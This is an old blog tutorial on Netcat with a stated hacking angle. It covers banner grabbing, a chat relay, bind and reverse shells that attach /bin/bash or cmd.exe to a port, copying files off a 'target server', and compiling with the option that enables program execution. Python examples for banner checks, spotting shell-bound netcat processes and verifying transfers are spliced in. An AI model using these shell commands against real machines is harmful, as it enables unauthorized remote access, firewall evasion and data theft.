Friday, December 16, 2011

NETCAT 101

Today I will go over the basics of the Netcat tool. This is a tool that can be used by anyone and can be used for many purposes. I will try to present a basic introduction to its general use, with a bias towards hacking aspects, and if you’re lucky I might follow up with some more advanced tutorials down the road. This should provide you with enough to get started and on your way. I will present everything in the usual manner, so try to keep up…

Prerequisites:
- Copy of Netcat: http://www.downloadnetcat.com/
  o This download contains both the Linux source with its Makefile, which can be easily compiled, and the Windows .exe binary. If you need help with the Linux compiling there are some notes in the readme & hobbit text files included with the download.
  o Microsoft .EXE Version: http://www.downloadnetcat.com/nc11nt.zip
- Access to testing machine(s)
  o I will present the tutorial using multiple machines, but this can all be done within a single machine if you do not have the proper resources available (it is just 10x easier to show and explain with two machines). Check the readme for some guidance if you don’t get things after reading the tutorial.
- A brain and some common sense :)

WHAT IS NETCAT?
Netcat is a program or utility which reads and writes data across network connections, using the TCP or UDP protocol. In its simplest form it creates a TCP connection to the target port of the target host. Your standard input is then sent to the host, and anything that comes back through the connection is sent to your standard output. Netcat can function as either the server or the client in the connection relationship: you can have it listen for inbound connections on a user-specified port, or use it to make outbound connections. You can even bind a service or program to the connection so it is served up to the other end of the connection (you know, things like /bin/bash or cmd.exe). Netcat can also work in UDP mode in the same manner as TCP, but I won’t be covering this much here as I will leave it for a more advanced follow up. I encourage you to read the readme and hobbit text files included with the download as they provide some good insight into the inner workings of this great tool. I will now try to show some examples of how we can use it to accomplish some basic stuff, but first run the help menu (nc -h) to see the available options:

NOTE: I used the additional “-s <Insert-Source-IP>” flag to define the source IP address. I did this as I am running the examples through my localhost and virtual machines. I was having problems getting a successful connection when listening on any IP, which is the default behavior…

BANNER GRABBING:
We can use Netcat to do some quick banner grabbing to see what type of system a target site is using. We use this simple command:

COMMAND (from Machine A): nc -v www.targetsite.com 80
NOTE: you can use IP address as well instead of www.name.com if you prefer

This will make a basic connection to www.targetsite.com on port 80, now you will need to type the following to read the HTTP header to find out some basic info about the target site/server:

IN THE EXISTING COMMAND PROMPT, type either:
GET / HTTP/1.0
OR
HEAD / HTTP/1.0
then press <ENTER> twice (the empty line tells the server the request headers are complete, and it answers)
RESPONSE: [screenshot of the HTTP response in the original post]

OR it might look more like this one: [second screenshot in the original post]

The point is that we can use Netcat to do port checks and banner grabs very easily. You can even change the port number to check the banners for different ports to see what version a particular service may be running. If you review the images above you can see we can find out the server type, version info, etc. You never really know what you will find running on a target host unless you check and sometimes you may just stumble across some low hanging fruit (outdated IIS, Apache, and others with well-known and publicly available exploits).
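To show what the banner grab above actually does on the wire (and what a quick check of your own servers' headers looks like), here is an added Python example, not code from the original post: it starts a throwaway HTTP responder on 127.0.0.1 with a constructed Server header standing in for www.targetsite.com, then connects exactly as nc does, writes HEAD / HTTP/1.0 followed by the blank line, and returns the raw response together with the parsed Server value. The responder, its canned reply and the function names are all assumptions made for this example.

```python
import socket
import threading

# Constructed HTTP response standing in for a real web server's reply;
# it was not captured from any real site.
CANNED_RESPONSE = (
    b"HTTP/1.0 200 OK\r\n"
    b"Server: ExampleHTTPd/1.2.3 (constructed)\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)


def start_fake_server(response=CANNED_RESPONSE):
    """Start a throwaway TCP server on 127.0.0.1 that answers one request.

    It plays the role of www.targetsite.com:80 from the tutorial so the
    example runs offline. Returns the ephemeral port it is listening on.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        with conn:
            # Read until the blank line that ends the request headers,
            # i.e. the <ENTER><ENTER> you type in the nc session.
            buf = b""
            while b"\r\n\r\n" not in buf and b"\n\n" not in buf:
                chunk = conn.recv(1024)
                if not chunk:
                    break
                buf += chunk
            conn.sendall(response)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def grab_banner(host, port, timeout=5.0):
    """Equivalent of 'nc -v host port' followed by typing 'HEAD / HTTP/1.0'.

    Opens a TCP connection, writes the request to the socket (what nc does
    with your stdin) and returns whatever comes back (what nc prints to
    stdout), decoded as text.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:  # server closed the connection: banner is complete
                break
            chunks.append(data)
    return b"".join(chunks).decode("iso-8859-1")


def server_header(banner):
    """Pull the Server: header value out of a raw HTTP response, or None."""
    for line in banner.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "server":
            return value.strip()
    return None


if __name__ == "__main__":
    p = start_fake_server()
    raw = grab_banner("127.0.0.1", p)
    print(raw)
    print("Server header:", server_header(raw))
```

Pointing grab_banner at one of your own hosts is a cheap way to audit how much version detail the Server header gives away; if it names an exact Apache or IIS build, that is the "low hanging fruit" the post describes, seen from the other side.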

BASIC NETCAT CONNECTION OR CHAT RELAY:
If we want to use NETCAT in its most basic form of sending input from Machine A to Machine B we can simply create a listener and connect to it. Anything you type on one end will come out on the other side, which can make for a crude way to have a two way chat session. It looks like this to set things up:

COMMAND (from Machine A): nc -v -l -p 31337

COMMAND (from Machine B): nc -v <Insert Machine A IP Address> 31337

First we create a listener on Machine A. Once we have the listener established, we enter the second command on Machine B, which instructs Netcat to make an outbound connection to the Machine A IP address on port 31337. Once this is done you have a successful Netcat connection which relays input between Machine A and Machine B, allowing you to create your very own chat relay. Try it with a friend!

OK, that’s cool, H.R., but why don’t you show me something cool, you say…

OK, how about we review how we can use Netcat to setup a BIND SHELL or a REVERSE CONNECT SHELL!

Yes that’s right, we can use Netcat and its ability to open inbound and outbound connections and take it a step further. We will use Netcat with the “-e” argument to execute a program and bind that program to our defined port. In this example I will be using cmd.exe on Windows and the /bin/bash shell on Linux, allowing us to be greeted with command shell access upon a successful Netcat connection between Machine A and Machine B. The commands to set this up look like this:

BIND SHELL:
COMMAND (from Machine A): nc -v -l -p 31337 -s <Insert Source IP for Machine A> -e cmd.exe
NOTE: I used the optional “-s <Insert-Source-IP>” flag to define the source IP address.

COMMAND (from Machine B): nc -v <Insert Machine A IP Address> 31337

This will BIND cmd.exe with the Netcat listener on Machine A to port 31337 (the -s flag is optional). When we connect to Machine A from Machine B we will be greeted with the cmd.exe command console, allowing us to execute commands on Machine A from Machine B.

*SPECIAL NOTE*: The above was for a Windows environment. Under Linux the process is entirely the same except you would need to change the “-e cmd.exe” to “-e /bin/bash” on Machine A, which is spawning the listener with the bound command shell. The above would look like this for Linux:

COMMAND (from Machine A): nc -v -l -p 31337 -e /bin/bash -s <Insert Source IP for Machine A>
NOTE: I used the optional “-s <Insert-Source-IP>” flag to define the source IP address.

COMMAND (from Machine B): nc -v <Insert Machine A IP Address> 31337


FULL Picture: [screenshot in the original post]

A special note that the “-l” will only establish a temporary listener that will be killed when the connection is terminated. If you would like to keep a persistent listener then you can change to the uppercase version, “-L”, which re-listens after each session (this option is in the Windows nc11nt build; the Unix 1.10 source does not have it). This can be a dangerous thing to do as there is no authentication mechanism built into Netcat itself, so if you do this do it with caution. That basically sums up how to use Netcat to set up a BIND shell; now let’s cover how to set up a reverse or back-connect shell so we can have the executed command shell phone home :)

REVERSE OR BACK CONNECT SHELL:
Above we set up a listener on the target site which executed shell commands when we connected. This was cool, but we can modify things a bit and change it so that we create a reverse or back-connect shell on our target site and then have our command shell phone home. This is also another way you can increase your chances of evading ingress filters and firewall restrictions if the BIND method is not working. The command syntax will be similar to what we used above, but we will modify it slightly so that instead of listening we are back-connecting (as well as executing our /bin/bash shell). It will look like this:

COMMAND (from Machine B): nc -v -l -p 31337 -s <Insert Source IP for Machine B>
NOTE: I used the optional “-s <Insert-Source-IP>” flag to define the source IP address.

COMMAND (from Machine A): nc -v <Insert Machine B IP Address> 31337 -e /bin/bash
NOTE: on the connecting side the destination port is given after the address; “-p” only sets the local source port, so it does not belong in this command.

Upon connection, Machine B will be handed a /bin/bash shell from which commands can be executed on Machine A. We have successfully back-connected a working shell from Machine A to Machine B using Netcat!


NOTE: I had to back-connect from another PC running Linux due to having no luck on the virtual machine for some unknown reason. I also had to temporarily disable my AV firewall as well as the Windows firewall for the back-connect to be accepted on my Windows 7 machine (Machine B). This is not required in all cases, but I could not get it to work despite my efforts to set up custom rules and exceptions. This is not a safe practice but it allows the connection through, so don’t forget to turn things back on when you are done…
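The bind and reverse shell sections above both come down to netcat being started with -e (or ncat's --exec); from the defensive side that is also the thing to alert on, especially the persistent -L listener the post warns has no authentication. The following Python is an added example, not part of the original post: it takes constructed process-listing lines (assumed format: PID, user, command line, as ps -eo pid,user,args would print) and classifies each netcat invocation as a bind-shell listener, reverse-shell client, plain listener or client. The sample lines, the flag sets and the function names are assumptions for this example.

```python
# Constructed process-listing lines in "PID USER COMMAND..." form, the kind
# of thing 'ps -eo pid,user,args' or a process-creation event gives you.
# None of these come from a real host.
SAMPLE_PROCESS_LINES = [
    "1201 www-data /usr/sbin/apache2 -k start",
    "1337 bob nc -v -l -p 31337 -e /bin/bash",               # bind shell from the post
    "1402 bob nc -v 192.0.2.10 31337 -e /bin/bash",          # reverse shell from the post
    "1510 bob ncat --exec cmd.exe -l 4444",                  # ncat spelling of the same thing
    "1611 bob nc -v -l -p 31337",                            # chat relay / file receive listener
    "1702 bob nc -z 192.0.2.10 22",                          # plain port check
    "1803 SYSTEM C:\\tools\\nc.exe -L -p 31337 -e cmd.exe",  # persistent -L listener
    "1904 bob nc -lvp 4444 -e /bin/sh",                      # bundled short flags
]

NETCAT_NAMES = {"nc", "ncat", "netcat"}

# Flags that attach a program to the connection: -e from this post, plus the
# equivalents in ncat (--exec, and --sh-exec / -c).
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}


def expand_flags(argv):
    """Collect option tokens, splitting bundled short options (-lvp -> -l -v -p)."""
    flags = set()
    for tok in argv[1:]:
        if tok.startswith("--"):
            flags.add(tok)
        elif tok.startswith("-") and len(tok) > 2 and tok[1:].isalpha():
            flags.update("-" + ch for ch in tok[1:])
        elif tok.startswith("-"):
            flags.add(tok)
    return flags


def classify_netcat(argv):
    """Return None if argv is not a netcat binary, else a short verdict string."""
    exe = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe.endswith(".exe"):
        exe = exe[:-4]
    if exe not in NETCAT_NAMES:
        return None
    flags = expand_flags(argv)
    executes = bool(flags & EXEC_FLAGS)
    listening = bool(flags & {"-l", "-L"})
    if executes and listening:
        verdict = "bind-shell listener"
        if "-L" in flags:  # re-listens after every session, so it stays open
            verdict += " (persistent -L)"
        return verdict
    if executes:
        return "reverse-shell client"
    if listening:
        return "plain listener"
    return "client"


def scan_process_lines(lines):
    """Map PID -> verdict for every netcat process found in the listing."""
    findings = {}
    for line in lines:
        pid, _user, cmdline = line.split(None, 2)
        verdict = classify_netcat(cmdline.split())
        if verdict is not None:
            findings[int(pid)] = verdict
    return findings


def high_severity(findings):
    """PIDs whose netcat has a program bound to the socket (the -e cases)."""
    return sorted(pid for pid, verdict in findings.items() if "shell" in verdict)


if __name__ == "__main__":
    found = scan_process_lines(SAMPLE_PROCESS_LINES)
    for pid in sorted(found):
        print(pid, found[pid])
    print("escalate:", high_severity(found))
```

A plain listener or client is often legitimate (the chat relay and file copy in this post both look like that), which is why the verdicts are separated: only the -e cases are worth an immediate escalation, and a bind-shell listener with -L is the one to chase first because it will still be there after the session that created it ends.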

COPY FILE FROM ONE MACHINE TO ANOTHER USING NETCAT:
OK, so we have a file on our target server (Machine B in this case) and we want to transfer it to our local machine (Machine A)…here is how we can do it using Netcat:

COMMAND (from Machine A): nc -v -l -p 31337 -s <Insert Source IP Address> > FileReceivedUponConnection.txt

COMMAND (from Machine B): nc -v <Insert Machine A IP Address> 31337 < FileToSendUponConnection.txt


We basically create a listener on Machine A, in this case our Linux box, and we point it to write anything received upon connection into a file (FileReceivedUponConnection.txt in the command above; MachineA-received.txt in the screenshots). We then create an outbound connection from our local Machine B to Machine A and we tell it to send the file (FileToSendUponConnection.txt above, MachineB-test.txt in the screenshots) upon connection, regardless of whether it is requested or not. Upon connection we see the creation of the text file on Machine A under its new name, and inside it contains the exact content of the file sent by Machine B.
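The file transfer above is just a raw TCP stream: the sender closes the connection when the file hits EOF, and the receiver writes everything it gets until then. Nothing checks that the bytes arrived intact, and nothing is encrypted or authenticated, so the practical check is to hash both ends afterwards. This added Python example (not code from the post) replays the two commands in-process on 127.0.0.1 with a constructed temporary file named after the post's file names, then compares SHA-256 hashes; all function names and the sample content are assumptions.

```python
import hashlib
import socket
import tempfile
import threading
from pathlib import Path

CHUNK = 65536


def sha256_file(path):
    """SHA-256 of a file, read in chunks so large transfers stay cheap."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def start_receiver(dest_path):
    """Receiver side, i.e. 'nc -l -p PORT > dest': accept one connection and
    write everything that arrives to dest until the sender closes.
    Returns (port, done_event); the port is ephemeral so the example cannot
    collide with anything else on the machine."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    done = threading.Event()

    def run():
        conn, _ = srv.accept()
        with conn, open(dest_path, "wb") as out:
            while True:
                data = conn.recv(CHUNK)
                if not data:  # EOF from the sender: the file is complete
                    break
                out.write(data)
        srv.close()
        done.set()

    threading.Thread(target=run, daemon=True).start()
    return port, done


def send_file(host, port, src_path):
    """Sender side, i.e. 'nc HOST PORT < src': stream the file, then close."""
    with socket.create_connection((host, port)) as s, open(src_path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            s.sendall(block)
        s.shutdown(socket.SHUT_WR)  # signal EOF; nc does this by exiting


def transfer_and_verify(src_path, dest_path, timeout=10.0):
    """Run both sides on localhost and return True only if the hashes match.
    The transfer itself has no integrity or confidentiality protection, so
    this hash comparison is the check to do after any netcat file copy."""
    port, done = start_receiver(dest_path)
    send_file("127.0.0.1", port, src_path)
    if not done.wait(timeout):
        raise TimeoutError("receiver did not finish")
    return sha256_file(src_path) == sha256_file(dest_path)


def demo():
    """Constructed sample: a temp file of known size goes from 'Machine B'
    to 'Machine A' (both 127.0.0.1 here). Returns (hashes_match, bytes_received)."""
    with tempfile.TemporaryDirectory() as tmp:
        src = Path(tmp) / "FileToSendUponConnection.txt"
        dst = Path(tmp) / "FileReceivedUponConnection.txt"
        src.write_bytes(b"constructed sample content\n" * 2000)  # 54000 bytes
        ok = transfer_and_verify(src, dst)
        return ok, dst.stat().st_size


if __name__ == "__main__":
    print(demo())
```

On real machines the equivalent of the final comparison is running sha256sum (or certutil -hashfile on Windows) on both files; if a transfer is cut short, the receiver still ends up with a plausible-looking file, and only the hash tells you it is truncated.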


OK, well that sums up my basic introduction to the wonderful network tool that is NETCAT. I hope you have found this tutorial informative and helpful. If you are starting out in the world of admins, security and/or hacking then you MUST get these basics down if you want to elevate your skills and take things to the next level. As always and until next time, Enjoy!

A FEW SPECIAL NOTES:
NCAT:
- You can also use the newer program NCAT, which is included in the latest NMAP download/installation. The command syntax is almost identical, but you may need to review the help menu for a quick look at the subtle differences; repeat everything here with ncat instead of nc or netcat and it should work for you.
COMPILING NETCAT:
- If you need to compile Netcat from source under a Linux environment, here is a quick run through of the steps you would need to take:
1. Upload the source files included in the download to the server you want to use Netcat on; you may want to create a new folder just for it to keep things clean until you have the hang of things…
2. Open a command terminal in the directory you just uploaded everything into
  o COMMAND: cd /path/to/upload/nc
3. Now we build the source with make. The 1.10 source ships a Makefile rather than a configure script: the system type is the make target, and the compile-time defines go in through the Makefile’s DFLAGS variable, so the whole build is one command
  o COMMAND: make <Insert SYSTEM Type> DFLAGS="-DGAPING_SECURITY_HOLE -DTELNET"
  o Supported SYSTEMS include: Linux, MSDOS, generic, SunOS, Solaris, AIX, HPUX, FreeBSD, and a few others (the make targets are lowercase, e.g. make linux). If you need the full list you can review the Makefile, or you can simply choose to compile with the “generic” system definition.
  o “-DGAPING_SECURITY_HOLE” compiles in the -e option that executes programs like command shells, so this will be needed if you are trying to create a BIND or Back-Connect Shell
  o “-DTELNET” enables support for telnet option auto-negotiation in our netcat so that we can use it to connect to a telnet server should we want to (if we are compiling from scratch anyway, why not)
4. COMMAND: nc -h

Type this at the command console you are using and hopefully you are properly greeted with the help menu for Netcat.



4 comments:

  1. Awesome tutorial :)) keep on going :D

  2. Lol, very nice man. Should help with transferring files to some team mates

  3. This comment has been removed by the author.

  4. Great post!
    You should also have a look at this http://h.ackack.net/cheatsheets/netcat
